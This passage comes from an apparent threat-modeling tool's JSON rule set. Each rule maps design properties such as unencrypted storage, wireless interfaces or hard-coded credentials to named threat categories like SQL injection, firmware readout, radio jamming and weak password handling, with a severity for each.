process.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","a77f314c-f74e-4340-a993-5a1a24f26db4","369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[],"Target":0},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"dedc4df7-5eab-4e98-aa28-5d16a99b98e7","Name":"Ext. Entity <- Process","Description":"External interactor gets input from process.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]}],"NodeRestrictions":[],"Target":1},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"cb3d7440-5d0f-482a-93cb-5ae9c625e31d","Name":"Uncleared Content","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"5656f112-8443-4245-aa38-38cd9d9375e0","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"69401648-0084-45ca-b984-505173c9cdb1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"NewProperty1","ComparisonType":"==","Value":false}}]},"overridenRuleIDs":[],"Severity":2},{"ID":"3459508a-9169-41ce-8e3a-6ea968023a3a","Name":"Physical Side Channels","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"c097b67f-1179-4f30-924c-3a4e54c04d9d","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"e8430761-3c2e-4db0-adbd-5310214574c2","DetailRestrictions":[]},"overridenRuleIDs":[],"Severity":2},{"ID":"821594a6-02e5-4a15-9a72-9cca5b57ee92","Name":"Firmware Readout","Description":"This enables IP theft and allows debugging of binaries to find further vulnerabilities that can be exploited","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"5605adab-044a-4b1f-9344-90a602d8d448","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","70d07015-4eda-4d1a-8d07-1791f881f8f0"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"cf7355d0-6f0c-4ad8-afa2-8689a81e28b8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e8430761-3c2e-4db0-adbd-5310214574c2","ComparisonType":"==","Value":false}}]},"overridenRuleIDs":[],"Severity":3},{"ID":"7cfa63f6-262b-4da3-aa88-6478522b45c5","Name":"Firmware Overwrite","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"01a37617-b7ac-446a-86fa-e70c957d154c","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596","f2ba26f4-b2da-49a8-aba2-14e42a746d6a"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"cf7355d0-6f0c-4ad8-afa2-8689a81e28b8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e8430761-3c2e-4db0-adbd-5310214574c2","ComparisonType":"==","Value":false}}]},"overridenRuleIDs":[],"Severity":4},{"ID":"5c21d6b7-2390-4f72-b29e-7d7985a30293","Name":"Improper Isolation","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"d4292863-c64e-4123-806f-71590ec76ed3","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"8bd42f0c-a4d2-4d98-9dcb-b9b100114fa5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"HasTrustedExecutionEnvironment","ComparisonType":"==","Value":true}}]},"overridenRuleIDs":[],"Severity":2},{"ID":"7b825bd7-222e-476f-bf22-85fe2e50eb6c","Name":"DoS attack from Internet","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"8f9a24d4-e962-4136-b0ec-8e9f797a6f62","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"]},"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":["b76ebd30-234d-4704-bf27-ab3e0bf5ae97"]},"SenderInterfaceRestriction":{"Property":{"ID":"","ComparisonType":"==","Value":null}}}]},"overridenRuleIDs":[],"Severity":2},{"ID":"13b5172b-9d6c-49a3-9580-fb256d5cd506","Name":"Decommissioned data store","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"327a2f35-8cf5-46d5-a973-a174f6f7be23","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","11a5c06f-875c-43fa-a01f-79f4819f98dd"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"80aa0465-21e0-41bd-b521-84a346c5f54b","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsEncrypted","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsVolatile","ComparisonType":"==","Value":false}}]},"overridenRuleIDs":[],"Severity":3},{"ID":"ddfef636-378c-4874-b2ea-33b0fcfe22c5","Name":"Access data exposure","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"7dc1eb8e-2312-4b2f-becf-f9725d45cdce","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"367702af-ceba-459b-84e5-27efe918968e","DetailRestrictions":[]},"overridenRuleIDs":["358f4f37-445a-4336-8107-c02d7b9cd3a4"],"Severity":4},{"ID":"32d4322f-482d-4a59-8f62-964ef8014a0b","Name":"Radio jamming","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"23c3a785-a539-4570-aee0-42bdffb43983","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"]},"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":true,"RestType":10,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"SenderInterfaceRestriction":{"Property":{"ID":"IsWireless","Value":true}}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":11,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"ReceiverInterfaceRestriction":{"Property":{"ID":"IsWireless","ComparisonType":"==","Value":true}}}]},"overridenRuleIDs":[],"Severity":3},{"ID":"b3450129-f094-4d50-bc87-efb4e8e84a12","Name":"Bad certificate","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"0b47795b-b42d-49d1-bf50-7f4889994fea","ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesReceiverAuthenticity","ComparisonType":"==","Value":true}}]},"overridenRuleIDs":[],"Severity":3},{"ID":"4611ab6f-adbf-47f3-86ff-8af0ac645d80","Name":"Improper user input validation","Description":"Verify that all input is verified for correctness using an approved list input validation approach.","IsActive":true,"RuleGenerationType":3,"Mapping":{"AttackVectorID":"d92ccd9c-3a24-4e07-a2ca-c1e9949bb386","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":0,"IsOR":true,"RestType":1,"PropertyRest":{"ID":"7632a126-216a-4463-83ef-6ce82331d9f8","ComparisonType":"==","Value":true}},{"Layer":0,"NodeNumber":0,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"18571d26-3d51-45b8-96f0-ff6e273e70c6","ComparisonType":"==","Value":true}}]},"overridenRuleIDs":[],"Severity":3},{"ID":"32dab43f-2dc8-4109-9420-ee7c118a82d5","Name":"Limitation of the charging power","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"ThreatCategoryIDs":["f2ba26f4-b2da-49a8-aba2-14e42a746d6a"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"5f755466-4417-4060-83de-64bddeabd1ba","DetailRestrictions":[]},"overridenRuleIDs":[],"Severity":2},{"ID":"4609cf84-96fa-4054-bf45-5b33993ce648","Name":"Blocking battery charging","Description":"For example, https://www.brokenwire.fail/","IsActive":true,"RuleGenerationType":2,"Mapping":{"ThreatCategoryIDs":["f2ba26f4-b2da-49a8-aba2-14e42a746d6a"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"5f755466-4417-4060-83de-64bddeabd1ba","DetailRestrictions":[]},"overridenRuleIDs":[],"Severity":2},{"ID":"1d39d1b0-8f3c-40f7-bb6d-f7699b3b4b07","Name":"Overcharging","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"ThreatCategoryIDs":["f2ba26f4-b2da-49a8-aba2-14e42a746d6a","17a04fbd-365f-4345-97f8-88d3c7382ec1"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"5f755466-4417-4060-83de-64bddeabd1ba","DetailRestrictions":[]},"overridenRuleIDs":[],"Severity":3},{"ID":"358f4f37-445a-4336-8107-c02d7b9cd3a4","Name":"Cleartext data storage","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"ef144ae1-4c70-400e-8222-b8a7dd3bf3e9","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"c7598413-4382-43e9-9904-fd9d877eb7a9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ContainsSensitiveData","ComparisonType":"==","Value":true}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ProcessedDataSensitivity","ComparisonType":">=","Value":2}}]},"overridenRuleIDs":[],"Severity":3},{"ID":"2759171a-24e3-4bfe-8ca7-5814902a000e","Name":"Cleartext storage on unencrypted physical storage","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"e851a284-6b41-41c9-9efd-dc8b01f788da","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"c7598413-4382-43e9-9904-fd9d877eb7a9","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":3,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"PhyElementRest":{"Property":{"ID":"IsEncrypted","ComparisonType":"==","Value":false}}},{"IsOR":true,"Layer":0,"RestType":3,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"PhyElementRest":{"Property":{"ID":"IsMultipleWritable","ComparisonType":"==","Value":true}}}]},"Severity":3},{"ID":"8b527d06-5d08-41c1-91fc-1c4146858987","Name":"Missing encryption","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"bb7358c1-e5b6-424f-962d-daab17345b63","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","8a3d81d9-3317-4e5d-88fe-a0e0592295fe"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":true,"Target":-1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","02b39924-b8f2-44da-a2bc-be1bd2450f68","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","02b39924-b8f2-44da-a2bc-be1bd2450f68","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesConfidentiality","ComparisonType":"==","Value":false}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":3},{"ID":"da0924b8-967c-406e-a2f5-a6ebac21de1d","Name":"Missing integrity check","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"001ba17c-0400-4369-912e-0ceda3ccd227","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":true,"Target":-1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","02b39924-b8f2-44da-a2bc-be1bd2450f68","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","02b39924-b8f2-44da-a2bc-be1bd2450f68","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesIntegrity","ComparisonType":"==","Value":false}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":2},{"ID":"3084a3b9-fdba-4bb1-97fa-c59ddbea7d22","Name":"SQL Injection","Description":"SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution. Any procedure that constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server will execute all syntactically valid queries that it receives. Even parameterized data can be manipulated by a skilled and determined attacker.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"1a511f9e-5d1b-47b9-9071-4d39407cc75c","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["74245351-b923-4cd6-b9e7-fe9f9916cbf5"]}],"NodeRestrictions":[]},"Severity":3},{"ID":"4c58a730-0161-4385-8249-bbf603ae1b88","Name":"Plaintext password","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"f0ef09ed-0cde-4b12-beb6-f1640132f3e6","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"367702af-ceba-459b-84e5-27efe918968e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ea6098a1-cc93-4f7d-a6c6-e9ec84e8c393","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"af1cd836-48c2-437c-93d0-58b7c9e1d0f6","Name":"Password hash w/o salt","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"0e3c0e3e-1587-46f8-93ea-e9091dff5958","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"367702af-ceba-459b-84e5-27efe918968e","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"452b2b74-1eb6-4edb-8921-274b2332c7bf","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ea6098a1-cc93-4f7d-a6c6-e9ec84e8c393","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"09881484-9a79-427d-a638-3e894af45c13","Name":"Missing authentication","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"d46f6e31-ae41-4d6e-93fc-0e6c3bbb295d","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"4e797b3d-fcdd-43ce-953e-8d5af2c47d91","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"db9caa64-fec1-47e8-9ed8-97896030cc90","ComparisonType":"==","Value":true}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"a5bb6218-f4e3-445f-95b3-1fc0be602d36","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"5c467e46-e642-49ad-a057-4784ec792125","Name":"Malicious code implanted","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"be14adbc-19a7-48c8-8f13-2566559e63e2","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","f2ba26f4-b2da-49a8-aba2-14e42a746d6a"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"80aa0465-21e0-41bd-b521-84a346c5f54b","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsEncrypted","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsMultipleWritable","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"2af47360-11c3-45e3-a43f-fc3efa8f6f4d","Name":"Reverse engineering","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"f6ddb913-05ab-485a-a736-46a3f7466f85","ThreatCategoryIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"a051ae84-5f0a-4f8e-a468-2d309cd7223f","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsCustomDesign","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"53fc96a4-96a0-42cc-bb2a-fc4515b8b008","Name":"PCB oversupply","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"90a4e8f3-c750-47c4-97fd-fa9e25b9b599","ThreatCategoryIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"a051ae84-5f0a-4f8e-a468-2d309cd7223f","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsIn-HouseProduced","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsReplaceable","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"9846541d-9bf3-4a2e-98cb-1ad13da5648b","Name":"Malicious peripheral","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"21c6b5ef-82c7-41e5-bb07-de93445b2156","ThreatCategoryIDs":["c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"a051ae84-5f0a-4f8e-a468-2d309cd7223f","DetailRestrictions":[]},"Severity":3},{"ID":"1da12d13-b7ea-4179-8c6b-b87a338d95a5","Name":"Provisioning data cloning","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a912b48a-3b4d-44ab-b8f3-28000ca945c4","ThreatCategoryIDs":[]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"a051ae84-5f0a-4f8e-a468-2d309cd7223f","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsIn-HouseProduced","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"63fb20c8-4a32-430e-bfa4-587503eaf572","Name":"Chip oversupply","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"90a4e8f3-c750-47c4-97fd-fa9e25b9b599","ThreatCategoryIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"6065e8dd-23c0-4dc9-ad51-628af88f3309","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsCustomDesign","ComparisonType":"==","Value":true}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsIn-HouseProduced","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"d0736981-7141-4d93-b493-d99135b8d236","Name":"Permissive status display","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"9538abd8-f79c-4097-b2dd-716e50a125ee","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"6b505c9a-c505-4305-8c07-a3cde1c1ddfc","DetailRestrictions":[]},"Severity":2},{"ID":"2b24dfec-f29a-4682-8066-db29831234ec","Name":"Missing password field masking","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"b9436449-7896-4be6-89f8-a19e1c8d014f","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"6b505c9a-c505-4305-8c07-a3cde1c1ddfc","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"04fc735e-8da5-409d-93c9-5d56eb0a852d","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"e3a2c92b-834f-408e-a4d2-87cfc66bd9fc","Name":"Password hash w/ predictable salt","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"05e04798-41ce-4919-a92b-264f7e985de2","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"367702af-ceba-459b-84e5-27efe918968e","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ea6098a1-cc93-4f7d-a6c6-e9ec84e8c393","ComparisonType":"==","Value":true}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"452b2b74-1eb6-4edb-8921-274b2332c7bf","ComparisonType":"==","Value":true}}]},"Severity":1},{"ID":"834aa7e3-1a0b-47a8-abdc-b4b1a6705377","Name":"IC reverse engineering","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"e6c3d6f5-f4c7-48b7-b516-2092c3557c81","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"e8430761-3c2e-4db0-adbd-5310214574c2","DetailRestrictions":[]},"Severity":2},{"ID":"78a3949d-8677-4426-b2b1-eb20b4296821","Name":"Draining attack","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"1447713d-9ad6-454e-81d8-c9f4ef34c72b","ThreatCategoryIDs":["9e715340-1a69-47df-864a-7c3b5a9a678e","b869918c-0b47-45c3-8fab-0b698043aa66","08d8fbba-5de4-4538-8674-43e214c3ebad","f2ba26f4-b2da-49a8-aba2-14e42a746d6a"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"1dc32bac-147f-42a4-a13c-44e5b59f7b81","DetailRestrictions":[]},"Severity":2},{"ID":"8ab20d5d-f624-46f5-beeb-833327d8673f","Name":"Hard-coded credentials","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"723dfb40-4ceb-4232-bda5-73bcb3c76ac0","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e1e92ae3-ee61-4cae-bfb5-be18e97ea587","ComparisonType":"==","Value":true}}]},"Severity":4},{"ID":"34b65a9d-ca44-44b0-b66f-aa5bacfc53b4","Name":"Default password","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"5e7fd04c-0e14-4c76-800d-f581bcf7c7f6","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"714ed1de-855c-491b-8a08-745a99e17413","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"67919611-8ec3-4d48-bbd7-03f963d6f12c","Name":"Password requirements","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"5435aa9a-ad52-470f-8fa5-81a4f926b6a6","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"540e39da-3227-4e6c-86ea-32a017318511","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"5585cf20-9e87-4ae5-960a-a952b07c37e5","Name":"Single-factor authentication","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"63dfaefa-c8a8-4725-b6d6-2efff7306639","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"88763e20-7878-4525-81d8-c4d09b867042","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"b3a678a2-87a5-42ae-a1ef-4ec599554471","Name":"Restriction of attempts","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"296e95fe-e06d-4ae3-be84-da98df4a122c","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"aa74f499-b995-4f5e-8d92-91f3ca172743","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"61452452-9fdc-4023-873d-93cd6d018abb","Name":"Session ID 